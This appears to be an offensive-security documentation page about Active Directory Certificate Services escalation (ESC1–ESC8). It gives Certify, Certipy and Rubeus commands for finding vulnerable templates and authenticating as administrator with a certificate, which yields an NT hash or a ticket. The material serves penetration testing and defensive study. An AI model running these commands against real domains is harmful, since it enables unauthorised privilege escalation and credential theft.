> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# ADCS Overview

> Active Directory Certificate Services: overview of ESC1-ESC8 vulnerabilities, Certify, and Certipy.

## Overview

Active Directory Certificate Services (ADCS) manages PKI certificates. Misconfigurations enable domain escalation. Research: "Certified Pre-Owned" by SpecterOps.

***

## Tools

### Certify (Windows)

```powershell theme={"dark"}
.\Certify.exe find /vulnerable
.\Certify.exe cas                    # List CAs
.\Certify.exe find                   # List templates
```

### Certipy (Linux)

```bash theme={"dark"}
certipy find -u user@domain.local -p 'password' -dc-ip DC_IP -vulnerable
certipy find -u user@domain.local -p 'password' -dc-ip DC_IP -stdout
```

***

## Vulnerability Summary

| ESC  | Name                            | Description                                                  |
| ---- | ------------------------------- | ------------------------------------------------------------ |
| ESC1 | Misconfigured Templates         | SAN allowed + enrollee can specify SAN + low-priv can enroll |
| ESC2 | Misconfigured Templates         | Any Purpose EKU or no EKU                                    |
| ESC3 | Enrollment Agent                | Enroll on behalf of other users                              |
| ESC4 | ACL Misconfiguration            | Write access to template → modify to ESC1                    |
| ESC5 | PKI Object ACL                  | Write access to CA objects                                   |
| ESC6 | EDITF\_ATTRIBUTESUBJECTALTNAME2 | CA flag allows SAN in any request                            |
| ESC7 | CA ACL                          | ManageCA + ManageCertificates permissions                    |
| ESC8 | NTLM Relay to HTTP Enrollment   | Relay NTLM to web enrollment endpoint                        |

***

## General Exploitation Flow

```
1. Find vulnerable template/CA
2. Request certificate (with target identity)
3. Use certificate to authenticate (PKINIT)
4. Get TGT → access resources
```

***

## Authenticate with Certificate

### Certipy

```bash theme={"dark"}
certipy auth -pfx admin.pfx -dc-ip DC_IP
```

Returns NT hash via U2U.

### Rubeus

```powershell theme={"dark"}
.\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /password:pfxpass /ptt
```

***

## Quick Reference

| Task           | Command                                              |
| -------------- | ---------------------------------------------------- |
| Find vulns     | `certipy find -u user -p pass -dc-ip DC -vulnerable` |
| Certify        | `.\Certify.exe find /vulnerable`                     |
| Auth with cert | `certipy auth -pfx admin.pfx -dc-ip DC`              |
| List CAs       | `certipy find -u user -p pass -dc-ip DC`             |
